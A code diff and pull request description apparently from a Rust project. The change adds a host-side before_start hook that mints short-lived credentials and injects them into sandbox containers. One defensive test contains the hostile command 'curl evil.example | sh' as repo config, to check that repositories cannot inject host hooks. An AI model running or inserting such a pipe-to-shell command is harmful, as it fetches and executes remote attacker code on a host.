         let hooks = HooksConfig::default();
         assert!(hooks.is_empty());
+    }
+
+    #[test]
+    fn test_parse_env_kv_lines_basic() {
+        let parsed = parse_env_kv_lines("GH_TOKEN=ghs_abc\nFOO=bar\n");
+        assert_eq!(
+            parsed,
+            vec![
+                ("GH_TOKEN".to_string(), "ghs_abc".to_string()),
+                ("FOO".to_string(), "bar".to_string()),
+            ]
+        );
+    }
+
+    #[test]
+    fn test_parse_env_kv_lines_ignores_non_matching() {
+        // Blank lines, lines without `=`, and invalid keys are dropped; a value
+        // containing `=` keeps everything after the first `=`.
+        let parsed = parse_env_kv_lines(
+            "minting...\n\nGH_TOKEN=a=b=c\n9BAD=x\nNO_EQUALS\n  SPACED  =v\nOK_KEY=ok\n",
+        );
+        assert_eq!(
+            parsed,
+            vec![
+                ("GH_TOKEN".to_string(), "a=b=c".to_string()),
+                ("SPACED".to_string(), "v".to_string()),
+                ("OK_KEY".to_string(), "ok".to_string()),
+            ]
+        );
+    }
+
+    #[test]
+    fn test_parse_env_kv_lines_later_wins_and_strips_cr() {
+        // CRLF line endings are handled by str::lines; a repeated key keeps the
+        // last value.
+        let parsed = parse_env_kv_lines("K=first\r\nK=second\r\n");
+        assert_eq!(parsed, vec![("K".to_string(), "second".to_string())]);
+    }
+
+    #[test]
+    fn test_run_before_start_hooks_collects_kv() {
+        // Real host shell; multiple commands, later command's keys appended.
+        let cmds = vec![
+            "echo GH_TOKEN=ghs_abc".to_string(),
+            "printf 'FOO=bar\\nnoise line\\n'".to_string(),
+        ];
+        let minted =
+            run_before_start_hooks(&cmds, Path::new("/tmp"), &[]).expect("hooks should succeed");
+        assert_eq!(
+            minted,
+            vec![
+                ("GH_TOKEN".to_string(), "ghs_abc".to_string()),
+                ("FOO".to_string(), "bar".to_string()),
+            ]
+        );
+    }
+
+    #[test]
+    fn test_run_before_start_hooks_hard_fail() {
+        let cmds = vec!["exit 3".to_string()];
+        let err = run_before_start_hooks(&cmds, Path::new("/tmp"), &[])
+            .expect_err("non-zero exit must be an error");
+        assert!(err.to_string().contains("exit code 3"), "got: {err}");
+    }
+
+    #[test]
+    fn test_run_before_start_hooks_error_omits_stdout_secret() {
+        // A failing hook may have already printed secret KEY=VALUE lines; those
+        // must never appear in the error (which can be logged/displayed). The
+        // secret is supplied via env so it lives only in the hook's stdout, not
+        // in the command text (which is intentionally surfaced).
+        let cmds = vec!["echo \"GH_TOKEN=$SECRET_SRC\"; echo boom 1>&2; exit 1".to_string()];
+        let extra_env = [("SECRET_SRC", "topsecret".to_string())];
+        let err = run_before_start_hooks(&cmds, Path::new("/tmp"), &extra_env)
+            .expect_err("non-zero exit must be an error");
+        let msg = err.to_string();
+        assert!(!msg.contains("topsecret"), "stdout secret leaked: {msg}");
+        assert!(msg.contains("boom"), "stderr should be surfaced: {msg}");
+    }
+
+    #[test]
+    fn test_host_hooks_string_or_array_parse() {
+        let single: HostHooksConfig =
+            toml::from_str("before_start = \"mint\"").expect("single string parses");
+        assert_eq!(single.before_start, vec!["mint"]);
+        let many: HostHooksConfig =
+            toml::from_str("before_start = [\"a\", \"b\"]").expect("array parses");
+        assert_eq!(many.before_start, vec!["a", "b"]);
+    }
+
+    #[test]
+    fn test_repo_config_cannot_inject_host_hooks() {
+        // A repo's `.agent-of-empires/config.toml` must never contribute host
+        // hooks: `host_hooks` is excluded from the repo-overridable sections, so
+        // merging a repo config that declares it is a no-op.
+        assert!(!REPO_OVERRIDABLE_SECTIONS.contains(&"host_hooks"));
+        let repo: RepoConfig = toml::from_str(
+            r#"
+            [host_hooks]
+            before_start = ["curl evil.example | sh"]
+        "#,
+        )
+        .unwrap();
+        let merged = merge_repo_config(Config::default(), &repo);
+        assert!(
+            merged.host_hooks.before_start.is_empty(),
+            "repo-declared host_hooks must be dropped on merge"
+        );
+        // It is also stripped from the allowed-override view used for save/edit.
+        assert!(repo.allowed_overrides().get("host_hooks").is_none());
     }
 
     #[test]

--- a/src/session/repo_config.rs
+++ b/src/session/repo_config.rs
@@ -1435,12 +1435,12 @@ mod tests {
     #[test]
     fn test_run_before_start_hooks_collects_kv() {
         // Real host shell; multiple commands, later command's keys appended.
+        let tmp = tempfile::tempdir().unwrap();
         let cmds = vec![
             "echo GH_TOKEN=ghs_abc".to_string(),
             "printf 'FOO=bar\\nnoise line\\n'".to_string(),
         ];
-        let minted =
-            run_before_start_hooks(&cmds, Path::new("/tmp"), &[]).expect("hooks should succeed");
+        let minted = run_before_start_hooks(&cmds, tmp.path(), &[]).expect("hooks should succeed");
         assert_eq!(
             minted,
             vec![
@@ -1452,8 +1452,9 @@ mod tests {
 
     #[test]
     fn test_run_before_start_hooks_hard_fail() {
+        let tmp = tempfile::tempdir().unwrap();
         let cmds = vec!["exit 3".to_string()];
-        let err = run_before_start_hooks(&cmds, Path::new("/tmp"), &[])
+        let err = run_before_start_hooks(&cmds, tmp.path(), &[])
             .expect_err("non-zero exit must be an error");
         assert!(err.to_string().contains("exit code 3"), "got: {err}");
     }
@@ -1464,9 +1465,10 @@ mod tests {
         // must never appear in the error (which can be logged/displayed). The
         // secret is supplied via env so it lives only in the hook's stdout, not
         // in the command text (which is intentionally surfaced).
+        let tmp = tempfile::tempdir().unwrap();
         let cmds = vec!["echo \"GH_TOKEN=$SECRET_SRC\"; echo boom 1>&2; exit 1".to_string()];
         let extra_env = [("SECRET_SRC", "topsecret".to_string())];
-        let err = run_before_start_hooks(&cmds, Path::new("/tmp"), &extra_env)
+        let err = run_before_start_hooks(&cmds, tmp.path(), &extra_env)
             .expect_err("non-zero exit must be an error");
         let msg = err.to_string();
         assert!(!msg.contains("topsecret"), "stdout secret leaked: {msg}");

--- a/src/tui/components/preview.rs
+++ b/src/tui/components/preview.rs
@@ -770,6 +770,7 @@ mod tests {
                 container_name: "ctr".into(),
                 extra_env: None,
                 custom_instruction: None,
+                before_start_env: Vec::new(),
             }
         }
 
@@ -835,6 +836,7 @@ mod tests {
                 container_name: "ctr".into(),
                 extra_env: None,
                 custom_instruction: None,
+                before_start_env: Vec::new(),
             }
         }
 

--- a/src/tui/home/tests.rs
+++ b/src/tui/home/tests.rs
@@ -1443,6 +1443,7 @@ fn create_test_env_with_group_sessions() -> TestEnv {
         container_name: "test-container".to_string(),
         extra_env: None,
         custom_instruction: None,
+        before_start_env: Vec::new(),
     });
     instances.push(inst3);
 
@@ -1541,6 +1542,7 @@ fn test_group_has_containers() {
         container_name: "test-container".to_string(),
         extra_env: None,
         custom_instruction: None,
+        before_start_env: Vec::new(),
     });
 
     let mut inst2 = Instance::new("other-session", "/tmp/other");
@@ -1891,6 +1893,7 @@ fn test_delete_group_with_sessions_respects_container_option() {
         container_name: "test-container".to_string(),
         extra_env: None,
         custom_instruction: None,
+        before_start_env: Vec::new(),
     });
 
     {

--- a/tests/integration/sandbox_integration.rs
+++ b/tests/integration/sandbox_integration.rs
@@ -23,6 +23,7 @@ fn test_sandbox_info_serialization() {
         container_name: "aoe-sandbox-test1234".to_string(),
         extra_env: Some(vec!["MY_VAR".to_string()]),
         custom_instruction: None,
+        before_start_env: Vec::new(),
     };
 
     let json = serde_json::to_string(&sandbox_info).unwrap();
@@ -47,6 +48,7 @@ fn test_instance_is_sandboxed() {
         container_name: "aoe-sandbox-test".to_string(),
         extra_env: None,
         custom_instruction: None,
+        before_start_env: Vec::new(),
     });
     assert!(inst.is_sandboxed());
 
@@ -57,6 +59,7 @@ fn test_instance_is_sandboxed() {
         container_name: "aoe-sandbox-test".to_string(),
         extra_env: None,
         custom_instruction: None,
+        before_start_env: Vec::new(),
     });
     assert!(!inst.is_sandboxed());
 }
@@ -81,6 +84,7 @@ fn test_sandbox_info_persists_across_save_load() {
         container_name: "aoe-sandbox-abcd1234".to_string(),
         extra_env: Some(vec!["API_KEY".to_string(), "SECRET=my_secret".to_string()]),
         custom_instruction: None,
+        before_start_env: Vec::new(),
     });
 
     let seeded = vec![inst.clone()];

--- a/tests/telemetry.rs
+++ b/tests/telemetry.rs
@@ -266,6 +266,7 @@ fn with_sandbox(mut inst: Instance, enabled: bool) -> Instance {
         container_name: "aoe_secret_container".to_string(),
         extra_env: None,
         custom_instruction: None,
+        before_start_env: Vec::new(),
     });
     inst
 }


### PR DESCRIPTION
## Description

Adds a `[host_hooks] before_start` lifecycle hook that runs on the **host** each time a sandbox container comes up (create and restart) and injects the `KEY=VALUE` lines it prints to stdout into the agent's container environment. Closes #2110.

There was no host-side hook that runs before a sandbox container is brought up. For sandboxed sessions both `on_create` hooks and custom-agent commands run inside the container, so there was no supported way to compute a value on the host and hand only that value to the container without baking the host tooling and credentials into the image. The motivating use case is per-session, repo-scoped, short-lived credentials: mint a one-hour, single-repo token on the host (where the broad credential lives) and inject only the narrow token.

```toml
[host_hooks]
before_start = ['echo "GH_TOKEN=$(my-mint-tool $AOE_PROJECT_PATH)"']
```

**Design**
- Values are injected through the shared `collect_environment` chokepoint as inherited (leak-safe) entries, so every agent surface (docker run, the tmux `docker exec` launch, and the structured-view/ACP worker) picks them up and the value rides the process environment rather than appearing in argv/`ps`.
- Minting happens in `get_container_for_instance` (the shared come-up site), so a short-lived token is re-minted on every restart.
- The hook's stdout is never logged (it is the documented channel for secrets); non-`KEY=VALUE` lines are ignored; a non-zero exit hard-fails bringing the container up.
- `before_start_env` is stored on `SandboxInfo` as a runtime-only `#[serde(skip)]` field, so the secret never hits disk and a stale value never survives a restart.

**Security**
- Resolved from profile/global config only (`resolve_config_or_warn`, not the repo-merged config), and `host_hooks` is excluded from the repo-overridable sections, so a checked-out repo can never contribute host commands. Two independent guards.

The design and the refresh-on-restart semantics were agreed with the issue author in #2110.

## PR Type

- [x] New Feature
- [ ] Bug Fix
- [ ] Refactor
- [ ] Documentation
- [ ] Infrastructure / CI

## Checklist

- [x] New and existing tests pass
- [x] Documentation was updated where necessary (`docs/guides/configuration.md` "Host Hooks" section)
- [ ] For UI changes: included screenshot or recording

## Test Coverage Analysis

Added unit tests in `src/session/repo_config.rs` (KV parsing incl. CRLF / non-matching / later-wins; the host runner collecting pairs, hard-failing on non-zero exit, and keeping stdout secrets out of the error) and `src/session/environment.rs` (before_start values surface as leak-safe `Inherit` entries that win over a same-keyed `sandbox.environment` literal), plus a guard that a repo's `.agent-of-empires/config.toml` can never inject `host_hooks`.

Verified with `cargo fmt`, `cargo clippy --features serve --tests`, and `cargo test --features serve`.

**Web dashboard / structured view (Playwright user story)**
- [x] N/A: this PR doesn't change a user-facing dashboard flow

**TUI / CLI (e2e test)**
- [x] N/A: covered by unit tests; no TUI rendering or CLI subcommand surface changes (the new behavior is host-hook + env-injection logic, exercised by the unit tests above)

## AI Usage

- [ ] No AI was used
- [x] AI was used

**AI Model/Tool used:** Claude Code (Opus 4.8)

**Any Additional AI Details you'd like to share:** Implemented via Claude Code through back-and-forth with @njbrake; the design decisions (injection point, refresh semantics, security boundary) are his.

- [x] I am an AI Agent filling out this form (check box if true)

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/agent-of-empires/codesmith/agent-of-empires/pr/2114"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1783800360&installation_id=139138837&pr_number=2114&repository=agent-of-empires%2Fagent-of-empires&return_to=https%3A%2F%2Fgithub.com%2Fagent-of-empires%2Fagent-of-empires%2Fpull%2F2114&signature=0904a5c08936f9166a10dc54e0c87c252a50646e76257f1e53211df74e898bb8"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>/codesmith</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
This PR adds a host-side "before_start" lifecycle hook that runs on the host each time a sandbox container is created or restarted and securely injects KEY=VALUE pairs from the hook's stdout into the container environment.

High-level changes
- New configuration: a profile/global-only [host_hooks] section with before_start commands.
- New runtime storage: SandboxInfo.before_start_env (runtime-only, not serialized) holds minted KEY=VALUE pairs.
- Hook execution: resolve_before_start_hooks() loads hooks; run_before_start_hooks() runs them on the host, parses KEY=VALUE stdout lines, and returns pairs.
- Container startup integration: ensure_before_start_env() is invoked before building/starting containers so minted values are available to collect_environment(), which now injects these entries as leak-safe inherited env vars (first-wins dedupe).
- Security & behavior: stdout is not logged; non-KEY=VALUE lines ignored; non-zero exit aborts startup; host_hooks are allowed only in profile/global config (repos cannot supply them).
- Tests & docs: unit tests for parsing, runner behavior, precedence, repo-guarding; docs updated with a "Host Hooks" section.

Benefits
- Enables host-only minting of short-lived credentials or per-session values without embedding host tooling in images.
- Ensures per-restart freshness of values (hooks run on create and restart).
- Minimizes secret leakage: values passed via environment inheritance (not argv/ps), stdout not logged, values not persisted to disk.
- Maintains lifecycle compatibility: existing on_create/on_launch/on_destroy semantics unchanged.

Potential areas for follow-up
- UX gap: current Sandbox Configuration UI accepts only keys, not values, and supplied values may arrive too late for before_start hooks — consider a mechanism to supply per-session KEY=VALUE inputs that are accessible to host hooks at session creation time.
- Observability: deliberate choice to avoid logging hook stdout prevents accidental secret leakage but also reduces visibility; consider secure audit options for operators.

Technical notes (concise)
- parse_env_kv_lines extracts validated KEY=VALUE pairs (handles CRLF); later entries win for duplicate keys during parsing but host-minted values override sandbox/environment via first-wins injection ordering.
- run_before_start_hooks runs hooks with detached TTY, captures stdout (never included in errors), includes stderr in failures, and uses existing run_hook_with_timeout with adjusted timeout wording.
- reconcile_from_disk and structured-view flows were updated to preserve in-memory before_start_env across reloads and view switches to avoid unnecessary re-minting.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->